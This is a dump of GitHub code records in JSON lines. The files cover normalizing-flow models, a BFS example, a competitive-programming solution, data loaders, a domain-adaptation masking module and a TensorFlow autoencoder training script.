size=len(train_df.index))\n valid = True\n ss = train_df.groupby('fold').sum()\n for f in range(num_folds):\n sr = ss.ix[f]\n fold_counts.append(sr)\n for k, v in sr.items():\n target = target_counts[k]\n thresh = target_thresh[k]\n diff = math.floor(abs(v - target))\n thresh = 3.0 if k == 'conventional_mine' else math.ceil(thresh)\n if diff > thresh:\n valid = False\n if f > furthest_fold:\n furthest_fold = f\n print(f, abs(v - target), math.ceil(thresh), k)\n break\n if not valid:\n break\n if valid:\n break\n else:\n fold_counts = []\n attempt += 1\n print(attempt, furthest_fold)\n for i, x in enumerate(fold_counts):\n print(i)\n for k, v in x.items():\n print(k, v)\n print()\n labels_df = train_df[['image_name', 'fold'] + list(count.keys())]\n labels_df.to_csv(\"labels.csv\", index=False)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"rwightman/pytorch-planet-amazon","sub_path":"scripts/process_labels.py","file_name":"process_labels.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"34"} +{"seq_id":"4588132045","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom spirl.modules.subnetworks import Predictor\nfrom spirl.modules.variational_inference import MultivariateGaussian\n\n\nclass NormalizingFlowModel(nn.Module):\n \"\"\"\n Joins multiple flow models into composite flow.\n Implementation extended from: https://github.com/tonyduan/normalizing-flows/blob/master/nf/models.py\n \"\"\"\n\n def __init__(self, flow_dim, flows):\n super().__init__()\n self._flow_dim = flow_dim\n self.flows = nn.ModuleList(flows)\n\n def forward(self, x, cond_inputs=None):\n m, _ = x.shape\n log_det = torch.zeros(m, device=x.device)\n for flow in self.flows:\n x, ld = flow.forward(x, cond_inputs)\n log_det += ld\n z, prior_logprob = x, self._get_prior(m, x.device).log_prob(x)\n return z, prior_logprob, log_det\n\n def inverse(self, z, cond_inputs=None):\n m, _ = z.shape\n log_det = torch.zeros(m, device=z.device)\n for flow in self.flows[::-1]:\n z, ld = flow.inverse(z, cond_inputs)\n log_det += ld\n x = z\n return x, log_det\n\n def sample(self, num_samples=None, device=None, cond_inputs=None):\n if num_samples is None:\n num_samples = cond_inputs[0].shape[0]\n if device is None:\n device = cond_inputs[0].device\n z = self._get_prior(batch_size=num_samples, device=device).sample()\n x, _ = self.inverse(z, cond_inputs)\n return x\n\n def _get_prior(self, batch_size, device):\n return MultivariateGaussian(torch.zeros((batch_size, self._flow_dim), requires_grad=False, device=device),\n torch.zeros((batch_size, self._flow_dim), requires_grad=False, device=device))\n\n\nclass RealNVP(nn.Module):\n \"\"\"\n Non-volume preserving flow.\n [Dinh et. al. 2017]\n Implementation extended from: https://github.com/tonyduan/normalizing-flows/blob/master/nf/flows.py\n \"\"\"\n def __init__(self, dim, cond_dim=None, hidden_dim=32):\n \"\"\"Constructs RealNVP flow. 
Note that input_dim == output_dim == dim.\n        cond_dim allows to add conditioning to the flow model.\n        \"\"\"\n        super().__init__()\n        assert dim % 2 == 0  # need even input/output dim to use split-in-half scheme\n        self.dim = dim\n        self.cond_dim = cond_dim\n        input_dim = self.dim // 2 if cond_dim is None else self.dim // 2 + cond_dim\n        self.t1 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n        self.s1 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n        self.t2 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n        self.s2 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n\n    def forward(self, x, cond_inputs=None):\n        \"\"\"Forward pass of the RealNVP module. Cond_inputs is a list of conditioning tensors.\"\"\"\n        assert len(x.shape) == 2 and x.shape[-1] == self.dim\n        if cond_inputs is not None:\n            assert np.prod([ci.shape[-1] for ci in cond_inputs]) == self.cond_dim\n        lower, upper = x[:, :self.dim // 2], x[:, self.dim // 2:]\n        t1_transformed = self.t1(lower, cond_inputs)\n        s1_transformed = self.s1(lower, cond_inputs)\n        upper = t1_transformed + upper * torch.exp(s1_transformed)\n        t2_transformed = self.t2(upper, cond_inputs)\n        s2_transformed = self.s2(upper, cond_inputs)\n        lower = t2_transformed + lower * torch.exp(s2_transformed)\n        z = torch.cat([lower, upper], dim=1)\n        log_det = torch.sum(s1_transformed, dim=1) + \\\n                  torch.sum(s2_transformed, dim=1)\n        return z, log_det\n\n    def inverse(self, z, cond_inputs=None):\n        assert len(z.shape) == 2 and z.shape[-1] == self.dim\n        if cond_inputs is not None:\n            assert np.prod([ci.shape[-1] for ci in cond_inputs]) == self.cond_dim\n        lower, upper = z[:, :self.dim // 2], z[:, self.dim // 2:]\n        t2_transformed = self.t2(upper, cond_inputs)\n        s2_transformed = self.s2(upper, cond_inputs)\n        lower = (lower - t2_transformed) * torch.exp(-s2_transformed)\n        t1_transformed = self.t1(lower, cond_inputs)\n        s1_transformed = self.s1(lower, cond_inputs)\n        upper = (upper - t1_transformed) * torch.exp(-s1_transformed)\n        x = torch.cat([lower, upper], dim=1)\n        log_det = torch.sum(-s1_transformed, dim=1) + \\\n                  torch.sum(-s2_transformed, dim=1)\n        return x, log_det\n\n\nclass FCNN(nn.Module):\n    \"\"\"\n    Simple fully connected neural network.\n    \"\"\"\n    def __init__(self, in_dim, out_dim, hidden_dim):\n        super().__init__()\n        self.network = nn.Sequential(\n            nn.Linear(in_dim, hidden_dim),\n            nn.Tanh(),\n            nn.Linear(hidden_dim, hidden_dim),\n            nn.Tanh(),\n            nn.Linear(hidden_dim, out_dim),\n        )\n\n    def forward(self, x, additional_inputs):\n        input = torch.cat([x] + additional_inputs, dim=-1) if additional_inputs is not None else x\n        return self.network(input)\n\n\nclass FlowDistributionWrapper:\n    \"\"\"Lightweight wrapper around flow model that makes it behave like a distribution.\"\"\"\n    def __init__(self, flow, cond_inputs=None):\n        self._flow = flow\n        self._cond_inputs = cond_inputs\n        self._detached = False      # indicates whether flow output should be detached\n\n    def log_prob(self, x):\n        _, prior_logprob, log_det = self._flow(x, self._cond_inputs)\n        if self._detached:\n            prior_logprob, log_det = prior_logprob.detach(), log_det.detach()\n        return prior_logprob + log_det\n\n    def nll(self, x):\n        return -1 * self.log_prob(x)\n\n    def sample(self):\n        return self._flow.sample(cond_inputs=self._cond_inputs)\n\n    def rsample(self):\n        return self.sample()\n\n    @staticmethod\n    def cat(*argv, dim):\n        # TODO: implement concatenation for flow distribution\n        return argv[0]\n\n    def detach(self):\n        self._detached = True\n        return self\n\n    def 
to_numpy(self):\n return np.zeros((1,)) # there is no numpy representation for an implicit function\n\n def entropy(self):\n return np.array(0.) # dummy value - entropy of flow not defined\n\n\nclass ConditionedFlowModel(nn.Module):\n \"\"\"Wraps flow model and conditioning network.\"\"\"\n def __init__(self, hp, input_dim, output_dim, n_flow_layers):\n super().__init__()\n self._hp = hp\n self._cond_net = Predictor(hp, input_size=input_dim, output_size=self._hp.nz_mid_prior,\n num_layers=self._hp.num_prior_net_layers, mid_size=self._hp.nz_mid_prior)\n self._flows = [RealNVP(output_dim, cond_dim=self._hp.nz_mid_prior) for _ in range(n_flow_layers)]\n self._flow_mdl = NormalizingFlowModel(output_dim, self._flows)\n\n def forward(self, obs):\n cond = self._cond_net(obs)\n return FlowDistributionWrapper(self._flow_mdl, cond_inputs=[cond])\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n\n # generate data\n data = np.concatenate((np.random.normal(loc=(1.0, 0.0), scale=(0.1, 0.1), size=(1000, 2)),\n np.random.normal(loc=(-1.0, 0.0), scale=(0.1, 0.1), size=(1000, 2)),\n np.random.normal(loc=(0.0, 1.0), scale=(0.1, 0.1), size=(1000, 2)),\n np.random.normal(loc=(0.0, -1.0), scale=(0.1, 0.1), size=(1000, 2))))\n np.random.shuffle(data)\n\n # set up flow model\n flows = [RealNVP(2) for _ in range(3)]\n model = NormalizingFlowModel(2, flows)\n\n pydata = torch.tensor(data, dtype=torch.float32)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.005)\n\n # train flow model\n for i in range(600):\n optimizer.zero_grad()\n flow_dist = FlowDistributionWrapper(model)\n loss = flow_dist.nll(pydata).mean()\n loss.backward()\n optimizer.step()\n if i % 100 == 0:\n print(f\"Iter: {i}\\t\" +\n f\"NLL: {loss.mean().data:.2f}\\t\")\n\n # visualize samples\n samples = flow_dist._flow.sample(num_samples=data.shape[0], device=\"cpu\").data.numpy()\n fig = plt.figure()\n plt.scatter(data[:, 0], data[:, 1], c='black', alpha=0.5)\n plt.scatter(samples[:, 0], samples[:, 1], c='green', alpha=0.5)\n plt.axis(\"equal\")\n plt.savefig(\"flow_data_fit.png\")\n plt.close(fig)\n\n\n ### Train second model to fit first model by minimizing empirical KL\n flows2 = [RealNVP(2) for _ in range(3)]\n sample_train_model = NormalizingFlowModel(2, flows2)\n optimizer = torch.optim.Adam(sample_train_model.parameters(), lr=0.005)\n\n for i in range(10000):\n optimizer.zero_grad()\n # flow_dist = FlowDistributionWrapper(model)\n flow_dist_sample_train = FlowDistributionWrapper(sample_train_model)\n loss_samples = []\n for _ in range(1):\n # data_sample = flow_dist._flow.sample(num_samples=data.shape[0], device=\"cpu\").detach()\n flow_sample = flow_dist_sample_train._flow.sample(num_samples=data.shape[0], device=\"cpu\")\n # loss = flow_dist_sample_train.nll(data_sample).mean()\n loss = (flow_dist_sample_train.log_prob(flow_sample) - flow_dist.log_prob(flow_sample))\n # loss = (flow_dist.log_prob(data_sample) - flow_dist_sample_train.log_prob(data_sample))\n loss_samples.append(loss)\n loss = torch.cat(loss_samples).mean()\n loss.backward()\n optimizer.step()\n if i % 100 == 0:\n print(f\"Iter: {i}\\t\" +\n f\"NLL: {loss.mean().data:.2f}\\t\")\n\n # visualize samples\n samples = flow_dist._flow.sample(num_samples=data.shape[0], device=\"cpu\").data.numpy()\n samples_sample_train = flow_dist_sample_train._flow.sample(num_samples=data.shape[0], device=\"cpu\").data.numpy()\n fig = plt.figure()\n plt.scatter(samples[:, 0], samples[:, 1], c='black', alpha=0.5)\n plt.scatter(samples_sample_train[:, 0], 
samples_sample_train[:, 1], c='green', alpha=0.5)\n plt.axis(\"equal\")\n plt.savefig(\"flow_sample_fit.png\")\n plt.close(fig)\n","repo_name":"clvrai/spirl","sub_path":"spirl/modules/flow_models.py","file_name":"flow_models.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"34"} +{"seq_id":"4421986441","text":"graph = {\n 'P' : ['Q','R','S'],\n 'Q' : ['P', 'R'],\n 'R' : ['P','Q','T'],\n 'S' : ['P'],\n 'T' : ['R'],\n \n}\n\nvisited = [] # List for visited nodes.\nqueue = [] #Initialize a queue\n\ndef bfs(visited, graph, node): #function for BFS\n visited.append(node)\n queue.append(node)\n\n while queue: # Creating loop to visit each node\n m = queue.pop(0) \n print (m, end = \" \") \n\n for neighbour in graph[m]:\n print(\"\\nneighbor:\",neighbour)\n if neighbour not in visited:\n visited.append(neighbour)\n queue.append(neighbour)\n print(\"queue:\",queue)\n\n\nprint(\"Following is the Breadth-First Search\")\nbfs(visited, graph, 'P') # function calling","repo_name":"SanaMateen/AILAB","sub_path":"uninformedsearch/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"6209241191","text":"# D - Union of Interval\n# https://atcoder.jp/contests/abc256/tasks/abc256_d\nN = int(input())\n\narea = [0] * (2 * 10**5 + 1)\nfor _ in range(N):\n l, r = map(int, input().split())\n area[l] += 1\n area[r] -= 1\n\nl = 2 * 10**5 + 1\ncnt = 0\nis_enabled = False\nfor i in range(1, 2 * 10**5 + 1):\n cnt += area[i]\n if cnt > 0:\n l = min(l, i)\n is_enabled = True\n elif cnt == 0 and is_enabled:\n print(l, i)\n l = 2 * 10**5 + 1\n is_enabled = False\n","repo_name":"kotadd/competitive_programming","sub_path":"simulation/abc256_d.py","file_name":"abc256_d.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23663276599","text":"import math\n\ndef make_table(name, proc):\n tabl = []\n for i in range(0, 360):\n tabl.append(proc(math.radians(i)))\n tabl_str = ''\n for v in tabl:\n tabl_str += str(round(v, 6)) + 'f,\\n'\n f = open(name, 'w')\n f.write(tabl_str)\n f.close()\n\nif __name__ == '__main__':\n make_table('sin.txt', math.sin)\n make_table('cos.txt', math.cos)\n make_table('tan.txt', math.tan)\n","repo_name":"Tuhkis/wingame","sub_path":"data/gen_table.py","file_name":"gen_table.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4666943311","text":"import numpy as np\nimport os\n\n\nclass DataLoader(object):\n def __init__(self, xs, ys, batch_size, pad_with_last_sample=True, shuffle=False):\n \"\"\"\n\n :param xs:\n :param ys:\n :param batch_size:\n :param pad_with_last_sample: pad with the last sample to make number of samples divisible to batch_size.\n \"\"\"\n self.batch_size = batch_size\n self.current_ind = 0\n if pad_with_last_sample:\n num_padding = (batch_size - (len(xs) % batch_size)) % batch_size\n x_padding = np.repeat(xs[-1:], num_padding, axis=0)\n y_padding = np.repeat(ys[-1:], num_padding, axis=0)\n xs = np.concatenate([xs, x_padding], axis=0)\n ys = np.concatenate([ys, y_padding], axis=0)\n self.size = len(xs)\n self.num_batch = int(self.size // self.batch_size)\n if shuffle:\n permutation = np.random.permutation(self.size)\n xs, ys = xs[permutation], ys[permutation]\n self.xs 
= xs\n        self.ys = ys\n\n    def get_iterator(self):\n        self.current_ind = 0\n\n        def _wrapper():\n            while self.current_ind < self.num_batch:\n                start_ind = self.batch_size * self.current_ind\n                end_ind = min(self.size, self.batch_size * (self.current_ind + 1))\n                x_i = self.xs[start_ind: end_ind, ...]\n                y_i = self.ys[start_ind: end_ind, ...]\n                yield (x_i, y_i)\n                self.current_ind += 1\n\n        return _wrapper()\n\n\nclass StandardScaler:\n    \"\"\"\n    Standardize the input\n    \"\"\"\n\n    def __init__(self, mean, std):\n        self.mean = mean\n        self.std = std\n\n    def transform(self, data, data_type):\n        if data_type == 'x':\n            return (data - self.mean) / self.std\n\n        if data_type == 'y':\n            return (data - self.mean[-1]) / self.std[-1]\n\n    def inverse_transform(self, data, data_type):\n        if data_type == 'x':\n            return (data * self.std) + self.mean\n        if data_type == 'y':\n            return (data * self.std[-1]) + self.mean[-1]\n\n\ndef make_data_loader(cfg):\n    data = {}\n    batch_size = cfg.DATA.BATCH_SIZE\n    test_batch_size = cfg.DATA.TEST_BATCH_SIZE\n    dataset_dir = cfg.DATA.DATASET_DIR\n    for category in ['train', 'test']:\n        cat_data = np.load(os.path.join(dataset_dir, category + '.npz'))\n        data['x_' + category] = cat_data['x']\n        data['y_' + category] = cat_data['y']\n\n    scaler = StandardScaler(mean=np.mean(data['x_train'], axis=(0, 1, 2)), std=np.std(data['x_train'], axis=(0, 1, 2)))\n\n    for category in ['train', 'test']:\n        data['x_' + category] = scaler.transform(data['x_' + category], 'x')\n        data['y_' + category] = scaler.transform(data['y_' + category], 'y')\n        pass\n\n    data['train_loader'] = DataLoader(data['x_train'], data['y_train'], batch_size, shuffle=True)\n    data['test_loader'] = DataLoader(data['x_test'], data['y_test'], test_batch_size, shuffle=False)\n    data['scaler'] = scaler\n\n    return data\n","repo_name":"ZixianReid/blue_green_alage_prediction","sub_path":"pred_core/data/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"622304877","text":"def GetRandomChar():\r\n    import random\r\n    a=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n    b=\"abcdefghijklmnopqrstuvwxyz\"\r\n    c=\"0123456789\"\r\n    random_str=\"\"\r\n    single=random.choice(a+b+c)\r\n    random_str+=single\r\n    return random_str\r\ncode=\"\"\r\nfor i in range(8):\r\n    code+=GetRandomChar()\r\nprint(\"The 8-character verification code is: {}\".format(code))\r\n","repo_name":"sadDarkHorse/SCUT-Python-Course","sub_path":"课后作业/实验(第5章_2)/5.2.py","file_name":"5.2.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32990025846","text":"import random\n\nimport torch\nfrom torch.nn import Module\n\nfrom mmseg.models.uda.teacher_module import EMATeacher\nfrom mmseg.models.utils.dacs_transforms import get_mean_std, strong_transform\nfrom mmseg.models.utils.masking_transforms import build_mask_generator\n\n\nclass MaskingConsistencyModule(Module):\n\n    def __init__(self, require_teacher, cfg):\n        super(MaskingConsistencyModule, self).__init__()\n\n        self.source_only = cfg.get('source_only', False)\n        self.max_iters = cfg['max_iters']\n        self.color_jitter_s = cfg['color_jitter_strength']\n        self.color_jitter_p = cfg['color_jitter_probability']\n\n        self.mask_mode = cfg['mask_mode']\n        self.mask_alpha = cfg['mask_alpha']\n        self.mask_pseudo_threshold = cfg['mask_pseudo_threshold']\n        self.mask_lambda = cfg['mask_lambda']\n        self.mask_gen = build_mask_generator(cfg['mask_generator'])\n\n        assert self.mask_mode 
in [\n 'separate', 'separatesrc', 'separatetrg', 'separateaug',\n 'separatesrcaug', 'separatetrgaug'\n ]\n\n self.teacher = None\n if require_teacher or \\\n self.mask_alpha != 'same' or \\\n self.mask_pseudo_threshold != 'same':\n self.teacher = EMATeacher(use_mask_params=True, cfg=cfg)\n\n self.debug = False\n self.debug_output = {}\n\n def update_weights(self, model, iter):\n if self.teacher is not None:\n self.teacher.update_weights(model, iter)\n\n def update_debug_state(self):\n if self.teacher is not None:\n self.teacher.debug = self.debug\n\n def __call__(self,\n model,\n img,\n img_metas,\n gt_semantic_seg,\n target_img,\n target_img_metas,\n valid_pseudo_mask,\n pseudo_label=None,\n pseudo_weight=None):\n self.update_debug_state()\n self.debug_output = {}\n model.debug_output = {}\n dev = img.device\n means, stds = get_mean_std(img_metas, dev)\n\n if not self.source_only:\n # Share the pseudo labels with the host UDA method\n if self.teacher is None:\n assert self.mask_alpha == 'same'\n assert self.mask_pseudo_threshold == 'same'\n assert pseudo_label is not None\n assert pseudo_weight is not None\n masked_plabel = pseudo_label\n masked_pweight = pseudo_weight\n # Use a separate EMA teacher for MIC\n else:\n masked_plabel, masked_pweight = \\\n self.teacher(\n target_img, target_img_metas, valid_pseudo_mask)\n if self.debug:\n self.debug_output['Mask Teacher'] = {\n 'Img': target_img.detach(),\n 'Pseudo Label': masked_plabel.cpu().numpy(),\n 'Pseudo Weight': masked_pweight.cpu().numpy(),\n }\n # Don't use target images at all\n if self.source_only:\n masked_img = img\n masked_lbl = gt_semantic_seg\n b, _, h, w = gt_semantic_seg.shape\n masked_seg_weight = None\n # Use 1x source image and 1x target image for MIC\n elif self.mask_mode in ['separate', 'separateaug']:\n assert img.shape[0] == 2\n masked_img = torch.stack([img[0], target_img[0]])\n masked_lbl = torch.stack(\n [gt_semantic_seg[0], masked_plabel[0].unsqueeze(0)])\n gt_pixel_weight = torch.ones(masked_pweight[0].shape, device=dev)\n masked_seg_weight = torch.stack(\n [gt_pixel_weight, masked_pweight[0]])\n # Use only source images for MIC\n elif self.mask_mode in ['separatesrc', 'separatesrcaug']:\n masked_img = img\n masked_lbl = gt_semantic_seg\n masked_seg_weight = None\n # Use only target images for MIC\n elif self.mask_mode in ['separatetrg', 'separatetrgaug']:\n masked_img = target_img\n masked_lbl = masked_plabel.unsqueeze(1)\n masked_seg_weight = masked_pweight\n else:\n raise NotImplementedError(self.mask_mode)\n\n # Apply color augmentation\n if 'aug' in self.mask_mode:\n strong_parameters = {\n 'mix': None,\n 'color_jitter': random.uniform(0, 1),\n 'color_jitter_s': self.color_jitter_s,\n 'color_jitter_p': self.color_jitter_p,\n 'blur': random.uniform(0, 1),\n 'mean': means[0].unsqueeze(0),\n 'std': stds[0].unsqueeze(0)\n }\n masked_img, _ = strong_transform(\n strong_parameters, data=masked_img.clone())\n\n # Apply masking to image\n masked_img = self.mask_gen.mask_image(masked_img)\n\n # Train on masked images\n masked_loss = model.forward_train(\n masked_img,\n img_metas,\n masked_lbl,\n seg_weight=masked_seg_weight,\n )\n if self.mask_lambda != 1:\n masked_loss['decode.loss_seg'] *= self.mask_lambda\n\n if self.debug:\n self.debug_output['Masked'] = model.debug_output\n if masked_seg_weight is not None:\n self.debug_output['Masked']['PL Weight'] = \\\n masked_seg_weight.cpu().numpy()\n\n return 
masked_loss\n","repo_name":"lhoyer/MIC","sub_path":"seg/mmseg/models/uda/masking_consistency_module.py","file_name":"masking_consistency_module.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"18"} +{"seq_id":"18698219865","text":"import argparse\nimport os.path\nimport sys, os\n\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\nimport autoencoder\nimport input_data2 as input_data\nimport models\nfrom tensorflow.python.platform import gfile\n\n\ntf = tf.compat.v1\nFLAGS = None\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\ndef main(_):\n min_val = -1.0\n min_val_ = -1.0\n cp_path = ''\n current_patient = 1\n my_patient = 3\n\n def early_stopping(val, cp, patient=3):\n nonlocal min_val, min_val_, cp_path, current_patient\n if min_val == -1.0:\n min_val = val\n min_val_ = round(val, 1)\n cp_path = cp\n return False\n\n if val < min_val_:\n min_val_ = val\n cp_path = cp\n\n val = round(val, 1)\n if val < min_val:\n min_val = val\n current_patient = 1\n else:\n current_patient += 1\n return True if current_patient >= patient else False\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.01)\n config = tf.ConfigProto(gpu_options=gpu_options)\n config.gpu_options.allow_growth = True\n\n # Start a new TensorFlow session.\n sess = tf.InteractiveSession(config=None)\n\n # We want to see all the logging messages for this tutorial.\n tf.logging.set_verbosity(tf.logging.INFO)\n\n # Begin by making sure we have the training data we need. If you already have\n # training data of your own, use `--data_url= ` on the command line to avoid\n # downloading.\n model_settings = models.prepare_model_settings(\n 1,\n FLAGS.sample_rate, FLAGS.clip_duration_ms, FLAGS.window_size_ms,\n FLAGS.window_stride_ms)\n audio_processor = input_data.AudioProcessor(\n FLAGS.mode, FLAGS.data_dir, FLAGS.silence_percentage,\n FLAGS.unknown_percentage, FLAGS.validation_percentage,\n FLAGS.testing_percentage, model_settings, FLAGS.test_dir)\n fingerprint_size = model_settings['fingerprint_size']\n model_settings['label_count'] = len(audio_processor.words_list)\n label_count = model_settings['label_count']\n time_shift_samples = int((FLAGS.time_shift_ms * FLAGS.sample_rate) / 1000)\n training_set_settings = {\n 'how_many': FLAGS.batch_size,\n 'offset': 0,\n 'background_frequency': FLAGS.background_frequency,\n 'background_volume_range': FLAGS.background_volume,\n 'time_shift': time_shift_samples,\n 'mode': 'training'\n }\n audio_processor.start_generator(training_set_settings,)\n\n # Figure out the learning rates for each training phase. Since it's often\n # effective to have high learning rates at the start of training, followed by\n # lower levels towards the end, the number of steps and learning rates can be\n # specified as comma-separated lists to define the rate at each stage. 
For\n # example --how_many_training_steps=10000,3000 --learning_rate=0.001,0.0001\n # will run 13,000 training loops in total, with a rate of 0.001 for the first\n # 10,000, and 0.0001 for the final 3,000.\n training_steps_list = list(map(int, FLAGS.how_many_training_steps.split(',')))\n tf.logging.info(training_steps_list)\n\n # 100 * 3920\n fingerprint_input = tf.placeholder(\n tf.float32, [None, fingerprint_size], name='fingerprint_input')\n\n logits, dropout_prob = autoencoder.create_blstm_model(\n fingerprint_input,\n model_settings,\n is_training=True)\n\n # Define loss and optimizer\n ground_truth_input = tf.placeholder(\n tf.float32, [None, fingerprint_size], name='groundtruth_input')\n\n # Create the back propagation and training evaluation machinery in the graph.\n with tf.name_scope('loss'):\n my_loss = tf.reduce_sum(tf.keras.losses.binary_crossentropy(ground_truth_input, logits), -1)\n loss = tf.reduce_mean(my_loss)\n tf.summary.scalar('my_loss', loss)\n\n global_step = tf.train.get_or_create_global_step()\n increment_global_step = tf.assign(global_step, global_step + 1)\n\n #checks = tf.add_check_numerics_ops()\n control_dependencies = []\n if not FLAGS.check_nans:\n control_dependencies = []\n\n with tf.name_scope('train'), tf.control_dependencies(control_dependencies):\n\n lr = FLAGS.learning_rate\n step_rate = 400\n decay = 0.9\n learning_rate = tf.train.exponential_decay(lr, global_step - 1, step_rate, decay,\n staircase=True)\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_step = optimizer.minimize(my_loss)\n\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=my_patient + 1)\n\n # Merge all the summaries and write them out to /tmp/retrain_logs (by default)\n merged_summaries = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/validation')\n testing_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/testing')\n\n init = tf.global_variables_initializer()\n sess.run(init)\n\n start_step = 1\n checkpoint_path = os.path.join(FLAGS.train_dir,\n FLAGS.model_architecture)\n if FLAGS.start_checkpoint:\n models.load_variables_from_checkpoint(sess, FLAGS.start_checkpoint)\n start_step = sess.run(global_step)\n\n tf.logging.info('Training from step: %d ' % start_step)\n\n # Save graph.pbtxt.\n tf.train.write_graph(sess.graph_def, FLAGS.train_dir,\n FLAGS.model_architecture + '.pbtxt')\n\n # Save list of words.\n with gfile.GFile(\n os.path.join(FLAGS.train_dir, 'labels.txt'),\n 'w') as f:\n f.write('\\n'.join(audio_processor.words_list))\n\n final = 0\n epoch = 0\n # Training loop.\n training_steps_max = sum(training_steps_list)\n for training_step in xrange(start_step, training_steps_max + 1):\n\n # Pull the audio samples we'll use for training.\n train_fingerprints, train_ground_truth = audio_processor.get_data_nb(\n mode='training'\n )\n # Run the graph with this batch of training data.\n train_summary, loss_value, *_ = sess.run(\n [\n merged_summaries, loss, train_step,\n increment_global_step\n ],\n feed_dict={\n fingerprint_input: train_fingerprints,\n ground_truth_input: train_ground_truth,\n dropout_prob: 0.3\n })\n\n learning_rate_value = sess.run(optimizer._lr)\n\n tf.logging.info('Step #%d: rate %f, loss %f, %d' %\n (training_step, learning_rate_value,\n loss_value, current_patient))\n is_last_step = (training_step == training_steps_max)\n if (training_step % 100 == 0) or is_last_step:\n\n pass\n\n if 
(training_step % FLAGS.eval_step_interval) == 0 or is_last_step:\n epoch += 1\n train_writer.add_summary(train_summary, epoch)\n\n set_size = audio_processor.set_size('validation')\n tloss = 0.0\n for i in xrange(0, set_size, FLAGS.batch_size):\n validation_fingerprints, validation_ground_truth = (\n audio_processor.get_data_nb(how_many=FLAGS.batch_size, offset=i,\n mode='validation'))\n # Run a validation step and capture training summaries for TensorBoard\n # with the `merged` op.\n vloss, *_ = sess.run(\n [loss],\n feed_dict={\n fingerprint_input: validation_fingerprints,\n ground_truth_input: validation_ground_truth,\n dropout_prob: 0.0 # keep all\n })\n batch_size = min(FLAGS.batch_size, set_size - i)\n tloss += (vloss * batch_size) / set_size\n val = tloss\n\n # validation summary\n # Create a new Summary object with your measure\n summary = tf.Summary()\n summary.value.add(tag=\"my_loss\", simple_value=tloss)\n validation_writer.add_summary(summary, epoch)\n\n # Save the model checkpoint periodically.\n tf.logging.info('Saving to \"%s-%d\"' % (checkpoint_path + '.ckpt', training_step))\n cp_path_ = '%s-%d' % (checkpoint_path + '.ckpt', training_step)\n saver.save(sess, checkpoint_path + '.ckpt', global_step=training_step)\n final = training_step + 1\n\n set_size = audio_processor.set_size('testing') #* 0\n if set_size:\n tloss = 0.0\n for i in xrange(0, set_size, FLAGS.batch_size):\n testing_fingerprints, testing_ground_truth = (\n audio_processor.get_data_nb(how_many=FLAGS.batch_size, offset=i,\n mode='testing'))\n\n testloss, *_ = sess.run(\n [loss],\n feed_dict={\n fingerprint_input: testing_fingerprints,\n ground_truth_input: testing_ground_truth,\n dropout_prob: 0.0 # keep all\n })\n batch_size = min(FLAGS.batch_size, set_size - i)\n tloss += (testloss * batch_size) / set_size\n\n # testing summary\n # Create a new Summary object with your measure\n summary = tf.Summary()\n summary.value.add(tag=\"my_loss\", simple_value=tloss)\n testing_writer.add_summary(summary, epoch)\n\n if early_stopping(val, cp_path_, my_patient):\n tf.logging.info('Current patient %d, %.1f' % (current_patient, round(val, 1)))\n tf.logging.info('%s : %.1f' % (cp_path, min_val))\n break\n tf.logging.info('Current patient %d, %.1f' % (current_patient, round(val, 1)))\n tf.logging.info('%s : %.1f' % (cp_path, min_val))\n # restore best weights and save\n models.load_variables_from_checkpoint(sess, cp_path)\n\n saver.save(sess, checkpoint_path + '.ckpt', global_step=final)\n\n sess.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--mode',\n type=int,\n default=0,\n help='0,1,2,3,4')\n parser.add_argument(\n '--data_dir',\n type=str,\n default='/home/hungshing/FastData/ezTalk/users/msn9110/voice_data/training/_0',\n help=\"\"\"\\\n Where to download the speech training data to.\n \"\"\")\n parser.add_argument(\n '--test_dir',\n type=str,\n default='/home/hungshing/FastData/ezTalk/users/msn9110/voice_data/testing',\n help=\"\"\"\\\n Custom testing set\n \"\"\")\n parser.add_argument(\n '--background_volume',\n type=float,\n default=0.1,\n help=\"\"\"\\\n How loud the background noise should be, between 0 and 1.\n \"\"\")\n parser.add_argument(\n '--background_frequency',\n type=float,\n default=0.8,\n help=\"\"\"\\\n How many of the training samples have background noise mixed in.\n \"\"\")\n parser.add_argument(\n '--silence_percentage',\n type=float,\n default=10.0,\n help=\"\"\"\\\n 